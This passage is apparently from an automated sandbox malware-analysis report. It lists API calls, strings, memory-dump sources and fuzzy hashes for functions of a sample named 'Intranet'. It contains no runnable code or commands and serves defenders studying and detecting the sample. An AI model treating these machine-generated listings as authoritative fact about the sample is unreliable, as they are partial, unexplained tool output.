                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00527395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 7b6dbb8800746bd3d69b8be0880032c1f570942f04d3506689a48defebb7707b
                                                                            • Instruction ID: adbd7eb3c0dce49a433dd1264c4169570e64f95ab994ac07f2ae1d086f911e4a
                                                                            • Opcode Fuzzy Hash: 7b6dbb8800746bd3d69b8be0880032c1f570942f04d3506689a48defebb7707b
                                                                            • Instruction Fuzzy Hash: 9F21AF32614228AFDF12CF54DC85EAF3BAAFF9E754F018524F9009B1D0C671AC51ABA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000,?,?,msctls_trackbar32,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00527D97
                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00527DAC
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00527DB9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: f559e582fa0a14c115855bdfa062d998050fff9fcb9d47b2f96acd6a9e7d557e
                                                                            • Instruction ID: d5c489cc432584ae7788ce2c5afcc610458ba58bdc5241808b6c97c0447d94ef
                                                                            • Opcode Fuzzy Hash: f559e582fa0a14c115855bdfa062d998050fff9fcb9d47b2f96acd6a9e7d557e
                                                                            • Instruction Fuzzy Hash: 2311C172244209BADF209E64DC05FEB3BA9FF8AB14F11451DFA41A60D1D6719811DB20
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12A8
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12C9
                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,80000001,80000001,?,004A1275,SwapMouseButtons,00000004,?), ref: 004A12EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: 411bf328dd2e9b0e03cddbba58f547e0f9848b058c695a682fcaddb85e8f4fde
                                                                            • Instruction ID: da52f4cba8ec3f09d0040a8bb1499afbcda4e731d40b187a23a79842bd817b62
                                                                            • Opcode Fuzzy Hash: 411bf328dd2e9b0e03cddbba58f547e0f9848b058c695a682fcaddb85e8f4fde
                                                                            • Instruction Fuzzy Hash: B0115A75510208BFEB208FA4DC84EAFBBBCEF16740F00459AF805E7260D2359E44A7A8
                                                                            APIs
                                                                              • Part of subcall function 004C593C: __FF_MSGBANNER.LIBCMT ref: 004C5953
                                                                              • Part of subcall function 004C593C: __NMSG_WRITE.LIBCMT ref: 004C595A
                                                                              • Part of subcall function 004C593C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000004,?,?,004C1003,?), ref: 004C597F
                                                                            • std::exception::exception.LIBCMT ref: 004C101C
                                                                            • __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                              • Part of subcall function 004C87CB: RaiseException.KERNEL32(?,?,?,0055CAF8,?,?,?,?,?,004C1036,?,0055CAF8,?,00000001), ref: 004C8820
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AllocExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID: `=S$h=S
                                                                            • API String ID: 2103478672-546560242
                                                                            • Opcode ID: d9974403edabd465a066c7372782d394cb7db9be52718ce1d8a485557695f2e6
                                                                            • Instruction ID: 22f7a7371e549686f0ae8297b75d9294e6bf02c207abb862a09f52166ebc4fcd
                                                                            • Opcode Fuzzy Hash: d9974403edabd465a066c7372782d394cb7db9be52718ce1d8a485557695f2e6
                                                                            • Instruction Fuzzy Hash: 0FF0D63850420DA6C760AA99EC11F9E7B9CAF01354F10046FF81492691DFB89A808298
                                                                            APIs
                                                                              • Part of subcall function 004DB544: _memset.LIBCMT ref: 004DB551
                                                                              • Part of subcall function 004C0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004DB520,?,?,?,004A100A), ref: 004C0B79
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,004A100A), ref: 004DB524
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004A100A), ref: 004DB533
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004DB52E
                                                                            • =T, xrefs: 004DB514
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=T
                                                                            • API String ID: 3158253471-2561935096
                                                                            • Opcode ID: da127c551d6e78fc9dc1bf13388f53042d746ab6e2ce0eea33a02478d2a75100
                                                                            • Instruction ID: 28c0ba67572776cf1c13950ef79a3685ad930f2434a144e8fb177911c4507a19
                                                                            • Opcode Fuzzy Hash: da127c551d6e78fc9dc1bf13388f53042d746ab6e2ce0eea33a02478d2a75100
                                                                            • Instruction Fuzzy Hash: 7CE06D74200711CBD3609F29E425B42BAE4EF1474CF11891FE446C3750EBB9E548CBA5
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004E027A,?), ref: 0051C6E7
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0051C6F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: a2a76802d7a1f6a36a2ffda72dec9aee88a699ad71f7c2cb761d2f7fcbb92122
                                                                            • Instruction ID: 60befe2a9488e95365e73a2029499e1b715423e73ad72835e0b7abd04c5f16ad
                                                                            • Opcode Fuzzy Hash: a2a76802d7a1f6a36a2ffda72dec9aee88a699ad71f7c2cb761d2f7fcbb92122
                                                                            • Instruction Fuzzy Hash: 44E08C391403128BEB204B25CC68A8A7ED4FF16305B40942EE885C2390D7B0C880CB50
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004B4B44,?,004B49D4,?,?,004B27AF,?,00000001), ref: 004B4B85
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004B4B97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: f7f5f061be5d05c145cf60b19daff623dcb3923f83f68fa952bdc6d4a213f39f
                                                                            • Instruction ID: 37b4a1acc0eff3c0305748a52e19f9ea4ae388f31d28e44f6f784172fd5f3b4c
                                                                            • Opcode Fuzzy Hash: f7f5f061be5d05c145cf60b19daff623dcb3923f83f68fa952bdc6d4a213f39f
                                                                            • Instruction Fuzzy Hash: 1ED017715147228FDB209F31EC28B467AE4AF15351F51982AD886E26D0EA74E884DA64
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004B4AF7,?), ref: 004B4BB8
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004B4BCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 32407f5642c92313d44ef474a12f4b14420eb00c75fbf4bbb4451437da9203ce
                                                                            • Instruction ID: 4fc8d2ad4244730e9f1a7596363755634dcbcf361d2e83f741cc372a24bc016b
                                                                            • Opcode Fuzzy Hash: 32407f5642c92313d44ef474a12f4b14420eb00c75fbf4bbb4451437da9203ce
                                                                            • Instruction Fuzzy Hash: 17D0C7324043228FDB208F30EC28B477AE4AF05341F00ACAAD882C2691EA74E880DA20
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00521696), ref: 00521455
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00521467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 40428c6e5d1d00c2d950c5c1eb05ed962fc36f010a1cf869b38ec1364dd7fee0
                                                                            • Instruction ID: 6c61086b92d0e4c9e09a92858d33581ee25afcd3cc055927091597b91e7eeadc
                                                                            • Opcode Fuzzy Hash: 40428c6e5d1d00c2d950c5c1eb05ed962fc36f010a1cf869b38ec1364dd7fee0
                                                                            • Instruction Fuzzy Hash: 24D01230510B228FDB205F75DC186077ED4BF27396F11C82A98D6D2690DA70E4C4C654
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,004B5E3D), ref: 004B55FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004B5610
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 0d1d28dd23acc795559cd509f992e87351133742df8eed34715f306dfbb7b795
                                                                            • Instruction ID: 6a046508b73c2496d6435bebfc1d4eebf5d58eb1b950d0ada9ffe6c39bf640da
                                                                            • Opcode Fuzzy Hash: 0d1d28dd23acc795559cd509f992e87351133742df8eed34715f306dfbb7b795
                                                                            • Instruction Fuzzy Hash: 0BD012755107128FD7209F31CC18757BBD4AF15355F11A82AD485D22D1D674C480CA54
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005193DE,?,00530980), ref: 005197D8
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005197EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: d1b4024c3480dd39d576bad9927f69670679a7b13fb228d3935403df411e39fc
                                                                            • Instruction ID: 4079cefdfda30428b42e72e7d6e01b8215c6c4cbe0f60c8e92e94b5cf2eed1b4
                                                                            • Opcode Fuzzy Hash: d1b4024c3480dd39d576bad9927f69670679a7b13fb228d3935403df411e39fc
                                                                            • Instruction Fuzzy Hash: 39D012715107138FEB209F71DCA8656BAD4FF16391F11982AD4D5D22D0DB74C8C4C651
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1780b62f8d5d49b3df5085e3e04d3fc274ddb536df04ecf9157d19afb8fccca8
                                                                            • Instruction ID: b914c997b5b530912b23cfd4669f7dbbe7f9d4925216a92646f3cd97f0569c1b
                                                                            • Opcode Fuzzy Hash: 1780b62f8d5d49b3df5085e3e04d3fc274ddb536df04ecf9157d19afb8fccca8
                                                                            • Instruction Fuzzy Hash: 87C16B75A0021AEFCB14CF98C884ABAB7B5FF48314B11859AE905DB351DB39ED81CB94
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0051E7A7
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0051E7EA
                                                                              • Part of subcall function 0051DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0051DEAE
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0051E9EA
                                                                            • _memmove.LIBCMT ref: 0051E9FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: e928e4a559de54922b353ad0e7fd319d6a7943edcf36463f9827967d0beda214
                                                                            • Instruction ID: e69b33a11779d1b08195054dac0eb6122202a0b4c1f29c15c862ca04427e20ee
                                                                            • Opcode Fuzzy Hash: e928e4a559de54922b353ad0e7fd319d6a7943edcf36463f9827967d0beda214
                                                                            • Instruction Fuzzy Hash: 11C19A71A083019FD714DF28C4819AABBE4FF89718F04896EF8999B351D731ED85CB92
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 005187AD
                                                                            • CoUninitialize.OLE32 ref: 005187B8
                                                                              • Part of subcall function 0052DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00518A0E,?,00000000), ref: 0052DF71
                                                                            • #8.OLEAUT32(?), ref: 005187C3
                                                                            • #9.WSOCK32(?), ref: 00518A94
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 948891078-0
                                                                            • Opcode ID: b2e11c646beb6580b9593a0be8ccc69a00931599eee13f3557ccff8b831cd38b
                                                                            • Instruction ID: 195016d8c03bf2b4609eb03181f9639970c27419b5afaaa609e408076e7fdcd7
                                                                            • Opcode Fuzzy Hash: b2e11c646beb6580b9593a0be8ccc69a00931599eee13f3557ccff8b831cd38b
                                                                            • Instruction Fuzzy Hash: CDA15535204B019FD710DF25C481B6ABBE4BF99324F14884EF9959B3A1CB74ED84CB96
                                                                            APIs
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8308
                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8320
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00530988,000000FF,?,00000000,00000800,00000000,?,00533C4C,?), ref: 004F8345
                                                                            • _memcmp.LIBCMT ref: 004F8366
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                            • String ID:
                                                                            • API String ID: 314563124-0
                                                                            • Opcode ID: a28abcaa75e5240c49fddc4b2a42e625100caafec3413a3f45de08df398fe227
                                                                            • Instruction ID: 422cdcf9bf3bd888dd8c869de03c29c80282fd8d3296d77dc7d1569b225767ee
                                                                            • Opcode Fuzzy Hash: a28abcaa75e5240c49fddc4b2a42e625100caafec3413a3f45de08df398fe227
                                                                            • Instruction Fuzzy Hash: 66811A75A00109EFCB04DFD4C984EEEB7B9FF89315F204599E506AB260DB75AE06CB60
                                                                            APIs
                                                                            • #8.OLEAUT32(?,?,?,00000001,?,?,?,?,?,?,?,?,?,004F779C,?,?), ref: 004F74AC
                                                                            • #2.WSOCK32(00000000,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F7555
                                                                            • #10.WSOCK32(?,?,?,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F7584
                                                                            • #9.WSOCK32(?,00000000,?,?,?,?,?,004F779C,?,?,00519B28,?,?,?,?), ref: 004F75AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
